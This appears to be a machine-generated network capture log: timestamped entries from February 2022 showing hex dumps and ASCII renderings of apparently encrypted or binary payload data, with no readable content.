                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC64INData Raw: 73 4f 4b 75 a9 ad ef 9b 5b a0 28 b5 c0 43 51 74 8d 28 86 27 46 e0 be 90 4a 68 2b f1 58 63 b8 79 cc 04 05 ab 0a 32 36 87 07 e1 01 3e e2 6d 85 61 59 e3 50 16 eb 96 22 45 1a c5 a4 5a a6 f5 75 7f b4 5e 50 58 b1 d4 5f b0 f2 e3 9a a4 6c 4e b2 14 f5 31 b0 21 52 27 26 e6 5f 96 07 a5 b6 c1 83 93 ab 7b d0 da d7 8b 1d bb 04 ac 74 d0 49 cb fa 97 a6 1f 36 e8 2e 4d f0 4d e9 95 3d 5f 96 c9 b6 58 b5 9e 5a 4d 94 dd ad 35 80 c1 6f cc 2e ec a5 3d d9 4a 8a 6a 57 01 cb 19 06 14 f1 40 7e ce 41 52 9b 8f 4d cd 20 7a 43 c5 b4 a2 7e 3c 35 0f 43 6e c0 28 ee b1 4e 55 4a 0c 62 04 50 66 75 62 c2 a0 df a6 5a d2 39 a4 e3 ae 68 07 a6 d2 05 3c 4e 72 65 c8 82 55 65 75 e1 8e 2f 5b a5 00 35 15 a0 d9 f6 70 50 9c 6b 9b 62 fa 2f 68 78 c6 08 f2 7f 0f 34 12 97 aa ac 30 5d e0 87 95 bf 75 b7 1e 70
                                                                                                                                                                                                                              Data Ascii: sOKu[(CQt('FJh+Xcy26>maYP"EZu^PX_lN1!R'&_{tI6.MM=_XZM5o.=JjW@~ARM zC~<5Cn(NUJbPfubZ9h<NreUeu/[5pPkb/hx40]up
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC65INData Raw: ba db da 48 ba ae 20 95 d7 e3 03 88 00 28 74 24 59 21 e1 46 d3 11 82 63 4b 54 5c fc ff 48 e6 8f 93 74 6f fb 52 9a 04 4c ca 54 53 78 26 6a a1 a2 c3 9b db 16 2e 25 4b a2 13 dc 55 26 60 32 2b 95 18 4e f3 df 2e fb e8 81 cd 1f 14 c3 f2 76 83 b4 a6 a1 ef 4f cb 42 d1 87 93 65 35 c2 e0 a0 ba f7 93 e8 6e 6f d3 07 e5 ed ce 3f 02 c4 51 31 3c 31 b2 e7 e9 63 49 43 51 2e c7 a9 c5 48 4f 5f 9b 8e 90 9f 24 dd 2c 72 54 bd 6d 2d f7 04 90 3e f7 5e f4 f4 4f 3d 86 e9 92 c3 4e a7 33 36 70 1b 1e fe ed 71 37 05 ea 85 e3 50 c3 c7 74 cf 1b 41 24 49 8a 30 0f 58 a1 f6 81 c8 a7 4e be b7 50 a8 06 35 f2 e1 39 ff 1c 5d 26 ea 57 20 80 5a dd 80 44 f1 34 6e 66 08 74 29 70 34 8d 3f 49 89 2e 5d 3b af 3f 1b 46 29 19 b2 66 d0 b8 c6 f7 9b 55 6a 66 b8 87 1c 22 c4 87 35 4b eb 4d c5 d3 3c 85 e9 6e
                                                                                                                                                                                                                              Data Ascii: H (t$Y!FcKT\HtoRLTSx&j.%KU&`2+N.vOBe5no?Q1<1cICQ.HO_$,rTm->^O=N36pq7PtA$I0XNP59]&W ZD4nft)p4?I.];?F)fUjf"5KM<n
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC66INData Raw: 14 a2 3c 3f 1d d3 ba a8 f1 2d 27 1a 61 68 a0 2c 59 73 7d 18 22 a6 63 85 21 45 5d c6 d8 a8 98 69 cf d4 78 ee 5a ea 62 4a c6 3a b3 9f d9 dc 5e a1 d9 ee 38 6e a9 6f 48 ae 83 b7 1c 08 00 5d db 13 51 4f ed 65 09 f7 8b 5f 25 07 9b a3 a7 a3 36 e0 d1 e3 af e6 e8 c0 53 55 84 d5 67 f1 5b 2b 78 f7 cc c1 dd 2d 19 84 86 4c 2a f9 0d d7 47 c3 6f e7 36 8d 06 8b ff 05 dd 16 8d 18 06 d7 94 c9 af a0 e9 0c e6 bb 37 65 fd ca 2f 29 9d 13 44 ff 75 83 42 2d 41 41 c5 2d 90 fe f2 35 84 2d 7e 17 fb 13 ba 11 43 09 c4 c9 22 ca 3e ee 8d 90 60 b9 b0 5b 05 b6 bc 92 0c 5d 9b 61 52 e7 fb 3e f3 1b ce b7 f9 04 d7 85 e0 72 35 b9 c9 9c e8 39 31 6a 2b 63 ef 79 d2 d1 4d e0 8e 0f 5f ac 30 1e 4c f6 49 d1 a0 e8 4c d5 6e 26 a2 f1 b7 6d 4a 79 26 21 29 d2 9e 23 85 6d b3 f9 91 ba d1 f6 d9 88 4a a5 80
                                                                                                                                                                                                                              Data Ascii: <?-'ah,Ys}"c!E]ixZbJ:^8noH]QOe_%6SUg[+x-L*Go67e/)DuB-AA-5-~C">`[]aR>r591j+cyM_0LILn&mJy&!)#mJ
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC68INData Raw: fc d6 33 53 9b 0a ca 88 86 43 b7 6b 98 e6 0d 65 4c ed 6d 27 60 ba ef ae fe 14 66 5b 21 bb 67 62 87 ee ba 15 ea c5 cb 00 d5 00 75 e2 28 c1 09 6f 19 94 28 3f af 9e e7 c7 b5 a4 4e 3f 73 4b b8 f2 0a 29 43 3b 5b e6 1a 67 c1 76 bc 65 8b 0b ed 7f 2a b1 07 c9 46 6c 78 69 59 af ac 54 37 71 a4 51 6b 58 bd 1d 49 a0 cb 85 9b 97 e2 71 9c 03 62 30 d0 5c d5 ae c3 53 d8 2e f2 90 81 57 49 65 a0 db 29 4f 75 72 c0 9a c0 b3 89 49 f8 3c b6 34 fd 4d db 61 d1 17 d1 9c cb 86 e3 ae c9 dc 1a 22 4f 95 56 eb 4e c0 a1 74 f8 53 57 3e 7b 0f 7f 03 2e a4 96 03 c4 b6 f2 53 29 4a 57 1a a0 9c dd 89 bf 00 cc d9 fb a6 38 d8 7f 43 28 61 21 24 42 6e 90 4d 49 df 47 09 2c 1f 1f 04 e4 04 75 fb 16 5d 8c f2 20 78 e7 81 0d 97 73 a3 0b 6c 4d 11 2c 62 2f 31 00 2a 4d 98 4f 88 79 58 d8 f1 da b0 b1 0a f6
                                                                                                                                                                                                                              Data Ascii: 3SCkeLm'`f[!gbu(o(?N?sK)C;[gve*FlxiYT7qQkXIqb0\S.WIe)OurI<4Ma"OVNtSW>{.S)JW8C(a!$BnMIG,u] xslM,b/1*MOyX
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC69INData Raw: d4 47 d7 b7 b9 a6 0f f5 93 f3 ac 6c 3b a1 16 9e c5 66 80 2f 93 4d 3c 3e c3 df 46 a6 a7 d8 0c 2f e2 cc 68 9e 5c 54 3f 6b 67 07 6c aa a0 0c 33 cf a2 e8 bf a3 c7 66 ec 50 a1 93 31 c7 b5 b0 ef 69 2d 2f f5 f2 35 8c 9c 7e f6 b7 8d f5 a7 2f ea bd 90 23 67 f2 71 50 22 2d 17 7a 67 8f b6 7b 84 a6 97 ae cb 52 20 3d 16 c1 44 b0 ec b5 a4 7a 69 d2 4d 26 8b 05 d5 1e 52 fa b4 86 c9 ef e8 5f 6a a5 af 2d 0f 6c ef a7 68 18 05 cb 36 5b 62 3e 6f 51 f8 b7 db 06 8b 8c f0 ee 67 e5 7b ab 55 3f 3c fe b8 16 db ac 8c bf 01 82 2e f1 be 38 db fc 3d 32 7a 79 60 79 0f a6 da d3 7a 26 e9 53 15 7b 9f 87 c5 d0 e8 44 ba 4e 06 04 84 90 4f ad 38 02 77 97 d6 a0 ae 62 24 5d 69 20 41 99 db 02 f2 76 66 4d e0 cd c6 cc cd d3 7c 40 f3 b8 19 99 19 23 78 81 65 b8 bd 9d ff 62 89 08 2b 89 7a ce 45 52 69
                                                                                                                                                                                                                              Data Ascii: Gl;f/M<>F/h\T?kgl3fP1i-/5~/#gqP"-zg{R =DziM&R_j-lh6[b>oQg{U?<.8=2zy`yz&S{DNO8wb$]i AvfM|@#xeb+zERi
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC70INData Raw: 0e 96 c8 9f f3 53 28 0c 35 76 c4 cb c3 34 58 3a 42 b3 0a 40 e3 f0 f2 b6 59 8a 4d 02 d9 15 57 e8 44 f5 ca ef 8b 79 a9 35 5e eb 06 8d 6d 84 06 b9 1d 0e bb 04 95 dd 95 d5 99 fc 28 36 07 2f e8 a5 40 30 5f 6a eb b8 4b a3 5e ff d2 8f 5e 2c d6 c5 50 73 23 d6 9c 87 f0 d0 fb 00 20 1d 46 57 70 43 12 7a d9 50 1e b3 40 2b 76 40 ba 33 47 ec b9 46 e3 98 9f b2 c1 ab 69 be e3 4e 6e 50 7d 7b d2 38 ec cf cc 15 ea 8b a6 99 02 70 a0 8f 7f f7 fb f1 a4 b3 73 06 8d 1a d2 05 3a 4e 73 4e c8 82 5d ec 95 d6 0e 93 4b d2 da 49 0d f6 31 19 a2 98 63 2d 44 a6 ee 70 b5 04 c3 6e 7b 73 12 e9 1f 3f dd f3 6e d4 0a dc 1e 5a ab b0 e1 fc 50 5b c7 ea 1c 5b 05 a5 6e ad 0b 75 b3 58 ef 9e da 7f 1e d3 60 28 d1 3c 71 bd 94 71 0a 41 d6 ed 75 4b 56 68 a2 5b 3c a0 90 a2 d8 68 50 28 b4 f0 98 7f e6 d7 5e
                                                                                                                                                                                                                              Data Ascii: S(5v4X:B@YMWDy5^m(6/@0_jK^^,Ps# FWpCzP@+v@3GFiNnP}{8ps:NsN]KI1c-Dpn{s?nZP[[nuX`(<qqAuKVh[<hP(^
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC71INData Raw: 2e e5 67 6b fa 66 af b6 39 01 55 31 34 ca 52 e7 fb 84 cf 44 9f 68 e2 e0 8a 46 51 65 16 ed 83 1c 6c bb ce 2a fa 48 50 95 5c b9 31 e5 8e 0f e7 31 73 1b 96 40 d7 45 21 71 95 fa af c5 e7 64 d6 64 75 0f 9c 68 64 83 d5 6a b5 95 bb 47 63 23 94 2c ca 10 54 bc 8e 10 d9 c4 5f 3c 32 f9 bd 2f 24 44 13 0a 55 d9 b1 e3 de f3 80 60 79 94 38 e1 b8 e4 c5 6e cd 02 16 b4 38 c3 0c ed fb d7 1f 4f 3f b7 a2 1d 37 51 43 be de ae 89 99 9f 77 35 bb 96 9d 5e aa 21 9d 4f 1f 31 b6 99 f2 cb 35 4d cf ee 37 0b 7a 0e 2b f5 ed 9a fc 19 28 c7 e2 b0 a6 a5 78 d9 26 d0 84 6d 1e fb 4d e2 61 7e 3a 5d 9e 06 17 14 43 09 2f 07 2a 68 6b bc aa 08 84 f0 7e ec e7 08 60 49 e7 71 d3 61 d9 28 1c d2 1c fb c2 07 92 91 21 de 46 d2 6b 83 63 4b 5f 36 00 7b 8a 27 dc 6c a4 bb 0c a0 f1 31 9a bf 2f 3b bf af a6 61
                                                                                                                                                                                                                              Data Ascii: .gkf9U14RDhFQel*HP\11s@E!qdduhdjGc#,T_<2/$DU`y8n8O?7QCw5^!O15M7z+(x&mMa~:]C/*hk~`Iqa(!FkcK_6{'l1/;a
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC73INData Raw: 0e b5 6e 9a 1f 4c 94 03 2a b4 fa b9 1f 90 43 69 5f 49 ac f3 38 af 64 70 43 75 17 71 e6 07 a9 b9 88 14 78 a6 d7 e5 72 65 38 15 7d 8f 4a cb 24 40 63 30 fc 08 b7 e5 57 41 1f fe 53 63 f6 74 d3 89 64 d2 c2 2f 36 0b d0 bc 82 b0 28 3c 11 ca 16 fd 3e 32 22 75 31 74 15 bc 20 e8 b7 00 27 12 4b b4 d7 a7 08 bc 36 a5 1b fa 8a e4 22 cf 18 49 43 85 d5 f7 fe 97 6e 67 b3 a1 c6 6a df 92 d0 8f 68 f7 a4 66 09 e9 e6 1c eb d3 7f c9 f1 f2 d8 94 f3 3c e6 87 c0 ae 10 dc d2 c1 c5 98 c5 36 66 56 b4 cc d8 73 b7 fe a1 1b c5 ce a1 48 24 db c5 98 37 d5 70 80 a0 b8 3a f5 4e 99 ae 91 d0 75 01 47 9c cb 92 81 f7 65 c6 b5 a8 4a 9d b4 74 0a a8 c8 d5 c4 c0 84 2a 90 c8 83 ec 2a 82 be d9 68 7f 5d a1 82 2d 6c 23 1e 4f 3e a0 50 de ce 2e 4c d6 e9 d8 11 eb 24 ac 3d b2 3c 9e 30 c6 c3 58 7e 61 c3 f1
                                                                                                                                                                                                                              Data Ascii: nL*Ci_I8dpCuqxre8}J$@c0WASctd/6(<>2"u1t 'K6"ICngjhf<6fVsH$7p:NuGeJt**h]-l#O>P.L$=<0X~a
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC74INData Raw: a9 6c a1 5f 4f 32 3e f8 b0 40 cf ff 57 f0 0b 33 a0 57 bc 46 e9 3d 5e 5e 68 a2 74 89 ce 30 91 7c d5 52 00 c4 17 e0 84 3b a7 05 61 f5 d8 5d 58 ce 55 7b 1d da ef 8b 8a 54 80 be fb d7 bc 1a cf c1 ee c4 49 cb a1 23 65 b8 d8 73 36 8e 72 7c 5a 0e b4 ca 14 d0 b2 4a a7 eb b0 dc 1d b4 52 81 09 73 90 06 b8 1d 33 eb ea 53 0f b6 c0 84 a4 e2 11 07 2a e5 76 bf be 18 fc 33 82 bd e7 d0 54 29 18 fc 2c cd 24 17 e2 06 44 0e 13 84 01 d7 4c 50 d9 57 e7 d4 8b 93 5a 63 fc 7b 42 0f 84 93 74 3b 08 a5 f4 c1 f4 ca 54 ba bc af aa b1 86 c3 fe 60 de d1 da 39 1c c0 d4 c4 be b8 de a7 27 28 3c cf 23 eb 48 d7 bc 0b 18 a8 03 81 fe 45 a4 c6 c1 a9 d8 49 75 31 cb c7 64 78 6f 14 71 c8 ff f8 87 ee 0b b6 04 b4 92 f6 8d c0 03 5d 68 7f 66 31 aa a6 16 97 a2 32 03 7d 22 84 cf 88 8c a3 ae db 7d 51 47
                                                                                                                                                                                                                              Data Ascii: l_O2>@W3WF=^^ht0|R;a]XU{TI#es6r|ZJRs3S*v3T),$DLPWZc{Bt;T`9'(<#HEIu1dxoq]hf12}"}QG
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC75INData Raw: b4 2a ca d4 46 d2 c7 62 71 6a e3 d6 8f 3e 93 57 6d 62 fa 32 74 ac 5a e7 99 d1 7d 67 d2 73 1a 7c a5 c1 d3 ed b6 71 85 bd 1b 39 7e 60 ba cb e1 32 a6 6c d1 80 de 0d 23 30 42 f0 56 59 f5 ba 29 87 21 7f 79 ad e1 56 36 eb 50 30 27 a4 74 f1 a7 cb 82 bb ce a1 90 ab 6b c8 f1 3f 5b ff 62 a8 34 7f a1 db 1c d8 b3 18 9a 79 d0 63 67 94 81 40 d4 c6 b5 aa fe 3b 73 e8 ed d0 5f 2a 68 c7 5b 85 dc 0a f0 c8 40 82 bc 60 67 a2 ed 36 7d b8 3e 26 c3 3e 91 bd 92 be ea a5 94 d6 e9 c8 17 0f 2b a1 f8 96 48 de 36 46 b3 26 87 1e a0 de c1 dd 9b 0c ed 84 a4 0d 22 ad 34 63 18 e8 d7 59 90 2e d6 68 61 d5 8b 0b 2f 21 72 87 20 88 57 db 3e c7 60 53 02 dc 5f 05 df f2 ed 5c af 54 7b a4 44 cc c1 05 62 f8 5c 85 67 70 a0 8d 67 eb ad 67 d8 66 4d 03 b0 a8 70 02 b4 ab 1a 80 b3 3e ba bc de 86 08 fc 30
                                                                                                                                                                                                                              Data Ascii: *Fbqj>Wmb2tZ}gs|q9~`2l#0BVY)!yV6P0'tk?[b4ycg@;s_*h[@`g6}>&>+H6F&"4cY.ha/!r W>`S_\T{Db\gpggfMp>0
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC77INData Raw: 04 bd 83 e1 8d f5 94 80 0a ec a5 d5 6a 0c 37 66 0a 06 5d b6 0e a1 14 1a 07 f4 0b ec 2d cb 37 66 b5 f8 34 c7 48 e5 03 a9 45 91 b9 bb 45 62 28 85 09 09 d4 9a c1 84 0c e1 c8 c0 12 3d 0a 26 95 5d 26 1e 79 89 ed 07 d6 9e 5e 41 e1 9c 4c 08 c5 d0 1b bc 22 ef ea 90 9a 95 b6 4c a4 e4 bb fe 46 47 8b 8b e2 bb 58 59 79 56 c4 89 68 de 5e fb 91 40 4a 09 05 73 00 d1 db ba bd 41 76 a5 09 23 10 ec f5 22 6f ae 47 bd e0 ed 84 86 6e a9 36 3d 76 e0 1b 8a d9 3b f3 33 e1 73 00 aa 9f 63 bd 27 25 22 8b db 00 2e a8 f3 a7 d8 f9 22 7c e7 ab 13 b2 93 82 e4 78 f6 ff a6 77 bd 0e 48 29 11 c4 98 6a b3 1e 56 27 a9 95 78 b9 2c 61 ed 7f 2a 6e 05 90 51 34 78 9c 9f af ac 5a be b5 76 c4 13 dc 34 58 32 10 9b 03 80 e2 1c fa eb 0b 62 1a 29 3c 48 19 2e 20 a2 57 54 9e 2f b9 e1 11 8a 83 4a ea 82 87
                                                                                                                                                                                                                              Data Ascii: j7f]-7f4HEEb(=&]&y^AL"LFGXYyVh^@JsAv#"oGn6=v;3sc'%"."|xwH)jV'x,a*nQ4xZv4X2b)<H. WT/J
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC78INData Raw: 21 00 9d 48 ba 80 7d a3 c9 64 97 b9 33 66 51 c0 9d 73 bd 92 62 b2 ca 63 c6 f0 4d f0 d6 cf 37 d5 fd d7 2f 60 0e 51 90 84 2a 9a 48 7c 13 c3 46 dc 5b 26 de a6 9b 45 2d 73 8d 9a 32 7e 61 85 21 91 fb cf de 60 e4 c5 cf 7e 0c 34 57 61 5d 1d 1e 60 d3 0c c7 82 7a 75 45 ba b3 82 7a 44 75 54 83 b7 4f 5e bf c9 4e 9e 14 53 02 15 a7 ce 31 a7 21 ee d8 de f7 4b 56 07 41 89 27 73 34 33 9c 5a 32 12 0d f8 87 96 35 16 41 b2 42 bf f5 29 31 c7 d1 18 b5 bf a4 54 bf e4 6a 5b 85 07 7a 69 a3 52 f6 43 50 3f 6b 3e d4 98 6b c8 f2 58 30 7a e8 13 44 29 f7 13 f8 a6 1d b6 58 59 4b 78 d7 26 8f 74 98 35 6d e9 21 ca 3f a2 09 c2 41 1f 46 6f b4 74 22 02 26 8f 68 85 58 30 f9 3f f9 31 b2 5d b7 cb 52 8f 97 db e4 b0 fa ec 18 e1 dd 10 5b 5e c2 05 59 81 ea ba 4d ee 29 5e 93 fe a6 cd 27 e4 e4 0f 3b
                                                                                                                                                                                                                              Data Ascii: !H}d3fQsbcM7/`Q*H|F[&E-s2~a!`~4Wa]`zuEzDuTO^NS1!KVA's43Z25AB)1Tj[ziRCP?k>kX0zD)XYKx&t5m!?AFot"&hX0?1]R[^YM)^';
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC79INData Raw: 5b c6 4f b6 1c 39 cf cc 49 10 dc 45 f2 80 36 7f bc 78 6b 24 74 79 8c d3 3e 49 38 27 c3 f4 65 56 0b 7e 03 49 33 dc f6 9f c3 f2 3a 4d 23 e4 20 43 ec 6b 08 b3 45 bc b2 d5 ad 7c 83 e5 51 1a f7 2b ed dd a2 07 92 2f 5b ea d9 28 a1 93 40 fe 57 2b 28 ee 1b 60 1f ff f3 bb cb 7a 4c 17 f3 1d b7 39 37 fe 75 de 31 3c 05 00 0d a6 d2 20 7f 41 20 5b 5b 35 63 c6 64 50 e6 6a 15 90 8a 21 44 cc 5f 77 25 92 2f ec 62 ca fa 1d de d1 f4 3a 3e 45 b2 85 13 b7 17 82 27 fe 2b 9c ab 53 e8 1a c3 ab 3a d3 f2 ef be fc 7e c6 25 0b 0f c0 87 94 4a af 07 02 07 91 c0 86 54 4b c5 9d 25 e8 2e 47 71 a9 e7 ac 37 0e 24 98 b3 d6 1a f3 92 44 c5 50 f8 62 97 76 8a f0 8a 13 9d fb b5 16 dc 5c bf 84 3c b5 75 97 46 48 e6 33 f0 25 9b e0 13 81 80 93 f2 c0 88 79 23 3c b2 6a 96 ed bf 20 b8 b1 5c 97 4a 0c ea
                                                                                                                                                                                                                              Data Ascii: [O9IE6xk$ty>I8'eV~I3:M# CkE|Q+/[(@W+(`zL97u1< A [[5cdPj!D_w%/b:>E'+S:~%JTK%.Gq7$DPbv\<uFH3%y#<j \J
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC80INData Raw: 15 26 10 c7 3c 13 45 78 56 83 3a 89 d4 13 5c 8e aa 0d c2 68 15 a5 6e fd bb 64 da 60 5c 08 a3 0f 3f d1 e3 a1 a6 99 f7 ee a5 cd c9 06 18 5c 46 5a bb 4f 05 66 6c dd 74 40 66 75 18 a8 61 a3 1f 50 1a e8 52 8d fd 85 96 4a e6 23 a0 f8 4a 6b 31 d3 9b 6e 45 66 75 13 59 47 cd 7c 7f 75 64 df 0f 0a 3b 86 49 21 11 1b 40 e9 af 0d ca 6d f8 26 74 32 92 fd 2a 39 c2 42 e2 50 70 7f 43 f9 1a 39 b9 b0 34 df 49 43 4c cf 69 55 34 ad b5 90 9d 96 44 90 67 8a 89 93 44 d0 1b ab 68 50 63 15 45 9e a7 34 ca 35 c3 bb a2 c8 1b 71 8c a8 48 e6 88 6f fb f3 ed dc 8e c5 1d 3b 7b 1e cc c1 7a da 18 25 13 5f 68 d3 6e cc 3a fa b3 c3 92 95 2c bf 8a 42 87 5e 61 55 10 a6 c2 cd a9 ec fd ef 13 0d a8 69 d0 20 df df f9 80 60 90 99 c4 1e 18 39 8a 9f 1d 7d 01 fa a9 38 7e db 1d 84 48 a7 95 cc 65 90 5d 51
                                                                                                                                                                                                                              Data Ascii: &<ExV:\hnd`\?\FZOflt@fuaPRJ#Jk1nEfuYG|ud;I!@m&t2*9BPpC94ICLiU4DgDhPcE45qHo;{z%_hn:,B^aUi `9}8~He]Q
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC81INData Raw: 68 5d a6 fb f6 36 66 d5 73 13 d2 c6 75 48 2b 11 3a 31 d7 6e ab 8e 85 84 66 bb 26 e9 ad a2 7d a1 b3 5d 97 cc d9 7e 7b ba 63 63 49 14 ce a1 91 5d 41 cb f7 a1 93 83 87 bc 6f c3 79 aa 43 c0 e2 00 28 50 0b 91 30 dc 9f f5 2a 3e 5b 4b 99 1e e2 02 10 7e c8 9e 28 d9 ad 7c a3 7c c9 aa 28 bf 39 69 4a 38 3d a1 ab be c4 72 2c 9c 35 bd 6f e7 be 48 e5 24 01 b7 1c 83 ad 4f fa 5e a9 c1 1c 1d f3 8b b4 3f a2 c2 83 2a b2 a7 e0 3f 01 91 ec af 89 d3 47 b2 93 18 50 f0 60 c1 f2 cd 89 19 b6 ff 9c 01 46 0b d1 10 89 30 e9 0d ce 22 18 07 27 56 75 de 65 35 f9 05 a8 b4 94 02 a6 64 2e 31 f6 43 f6 49 be bf b5 29 9d 13 af 7b b8 50 c9 4d f2 9b db cd 36 84 f1 e3 55 64 33 68 e6 b6 15 22 38 06 46 60 6b 70 1d 33 4b 1d eb 29 5a ea bb 86 3f 05 56 8e fa 32 56 95 aa 71 be 48 d7 d7 0f 39 f8 ff 5f
                                                                                                                                                                                                                              Data Ascii: h]6fsuH+:1nf&}]~{ccI]AoyC(P0*>[K~(||(9iJ8=r,5oH$O^?*?GP`F0"'Vue5d.1CI){PM6Ud3h"8F`kp3K)Z?V2VqH9_
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC82INData Raw: a1 0c 9f 5c 66 25 1c 38 c8 f7 25 42 0e 22 89 ba bc 22 6c a5 c6 c9 49 c5 88 8f 51 51 14 d3 dc 45 02 b1 69 4b 22 cd 61 0f 68 3d 9c 58 c0 81 9b a5 88 dc 7b 6a 58 fc 62 61 81 97 24 09 9b fe 8c 99 6d e4 20 c0 73 f8 6e 10 8c 96 ea 65 20 f3 0a eb 1b 5a c5 76 13 37 a2 a6 3e 1a 70 b5 d1 8b a0 b0 cc 4c 1e 74 fe e2 28 a9 c3 21 9d 20 45 55 c1 f4 9e 1d 73 c8 f7 25 60 18 50 0b d3 89 48 b0 54 34 8d ac 59 f6 29 ed 26 61 6e d1 0a b8 63 80 86 92 cf 4a 83 6f f2 5c 16 38 e4 2b ee 0b c8 4d 8c 81 3c ec c3 0f 96 a4 6a 7e 6a 13 29 a4 19 51 aa 88 cd 22 7f 15 78 c3 a6 f0 f7 e1 c1 07 89 00 72 e5 55 ed c3 81 a8 c0 49 cb ac 07 0b 6d 2f e8 2e ce f3 10 96 14 ca a0 1d 35 88 9d dd b6 d9 89 e5 d5 38 dc c6 1d 90 a2 d6 fb 29 ee 1d 46 5f f9 b7 1c 4a d9 58 1c d0 15 e2 fd 56 38 db e5 13 2c c4
                                                                                                                                                                                                                              Data Ascii: \f%8%B""lIQQEiK"ah=X{jXba$m sne Zv7>pLt(! EUs%`PHT4Y)&ancJo\8+M<j~j)Q"xrUIm/.58)F_JXV8,
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC84INData Raw: e0 0d ae 0a 9d 45 2c 93 36 b3 2e 9e 5e 6d 34 d8 fc 50 69 22 37 d6 9b 7d ed 05 be 78 53 0a e2 e8 e3 a8 20 8f 1b 24 c7 e1 50 03 e3 45 b4 df 1f ee a6 7e 36 2f a1 fd 60 d2 32 a9 22 d2 1f ca 9d 50 f0 0a 28 bc c7 32 c5 2b f0 94 4c be ff 6b 63 6c 3c 60 48 81 9a 64 cf 51 ed 72 e0 6d 11 c9 d7 51 2d 6b ba 1d 53 3d 9f 7f 75 13 f2 31 4f ca a0 e0 fb 24 8d fd e9 15 b1 c7 53 96 c5 b6 90 e6 b0 c7 e6 f2 b1 b4 e7 fd 19 7a 8b 13 b3 1b 70 05 a0 06 e5 68 66 1d af 26 e3 70 06 1f 65 ee cb 52 e7 f1 bf 37 cd d5 34 f1 1f 99 33 cf 96 63 29 dc cf 02 d9 85 2a 79 05 ad 16 97 35 c8 24 81 96 ad e7 a2 16 40 9a 10 5e 83 4d 4e c5 5e 24 aa cb 6e 78 de 7b 36 1f f1 c5 38 2a c0 bf 3a ec ca 76 70 7c 32 4c cb 2a 5a 61 85 38 0d 6a da d0 f7 70 7a 44 2e dc d3 62 26 33 36 24 e4 60 78 a7 f1 62 23 82
                                                                                                                                                                                                                              Data Ascii: E,6.^m4Pi"7}xS $PE~6/`2"P(2+Lkcl<`HdQrmQ-kS=u1O$Szphf&peR743c)*y5$@^MN^$nx{68*:vp|2L*Za8jpzD.b&36$`xb#
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC85INData Raw: b4 fc 15 15 e3 f1 b9 02 b3 2c 19 35 74 a4 a0 96 a9 49 a9 48 ff d0 a7 28 11 96 59 f3 70 3e 7c a6 77 d8 32 dd 79 9c a2 8b 34 ec 9d 89 aa 24 c2 00 42 d9 32 bc fd 8c 83 50 40 8e e1 4c bb e5 50 fc 5a be 81 aa b9 a7 a4 cb a7 d9 d0 b6 00 40 b2 5c 76 dc d7 9c bb 5d d9 9c 8f 45 30 95 4d 7f 15 f2 fc 5e c8 1f cc b2 6d 86 0e fb 29 81 7b 70 de db 85 59 9b 21 8d aa c8 c7 5b 5b ce 34 d6 ae e3 b0 9f 97 db 64 8d 56 53 07 8e 93 dd ad 41 b8 95 d5 18 ca 48 a5 41 96 03 34 6d 32 ce a5 e7 f9 68 64 a0 fb 10 40 52 10 ca 1b cb 50 fb 7e 3f 13 2b fa 81 14 b9 ea 1a 3e 6d 50 08 f6 10 a2 e3 37 c4 00 b3 59 14 f9 e5 27 a8 e9 d1 d7 28 b3 f8 80 04 4c cd 04 39 4e bd b2 c8 82 55 65 6d 04 f5 52 12 dd 44 40 07 f6 b1 ca e6 5f 19 dd c6 62 fa a4 ae b4 4f 3b 9b 21 0a 31 aa 8a 7d ce 30 e7 41 ca 75
                                                                                                                                                                                                                              Data Ascii: ,5tIH(Yp>|w2y4$B2P@LPZ@\v]E0M^m){pY![[4dVSAHA4m2hd@RP~?+>mP7Y'(L9NUemRD@_bO;!1}0Au
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC86INData Raw: 7d 54 57 8d 37 79 ab 94 66 c5 04 37 69 ba 57 5c 2f c4 98 34 9d f2 50 9e 75 29 9d 90 a8 f4 76 7c 4e da 4d 16 c9 9b be b1 af f6 3b ed 03 b7 3d 92 e5 a1 b4 8d 13 7f 57 48 d5 35 42 f4 69 64 57 64 e2 ba d6 c0 0a e4 46 b7 09 e7 78 05 e4 c7 54 e0 f1 e7 88 19 8c 90 c3 b0 4f a4 ef cf e2 a1 0c 2e ef 83 d8 78 5d 6f f3 1b e1 20 61 49 90 d2 98 ee d2 e4 c1 c1 fc 47 aa 68 3e 28 0f f7 67 68 64 9b d3 ac c5 e0 64 37 a2 6e 57 a1 f7 f9 8f 82 0a 9b ce 4f 0a 25 b9 bc a9 fb 37 df a4 dc c3 8e 26 35 8c 11 01 9e 87 6b bb 25 f7 e5 10 00 75 9c bf 88 5e b2 aa 38 e6 9c c3 a1 49 69 4d 69 20 45 43 67 fa 51 fd 61 cd 61 d1 af 0d cf 0e 11 5b 52 47 e6 31 4e 48 61 2f e6 be 32 4e e4 05 97 aa 17 36 b3 bf 0a 31 f9 df 69 6e f4 06 b0 84 8f 0a 44 f4 44 52 e3 f5 53 7f 15 21 d9 fa 82 8b 12 07 64 5a
                                                                                                                                                                                                                              Data Ascii: }TW7yf7iW\/4Pu)v|NM;=WH5BidWdFxTO.x]o aIGh>(ghdd7nWO%7&5k%u^8IiMi ECgQaa[RG1NHa/2N61inDDRS!dZ
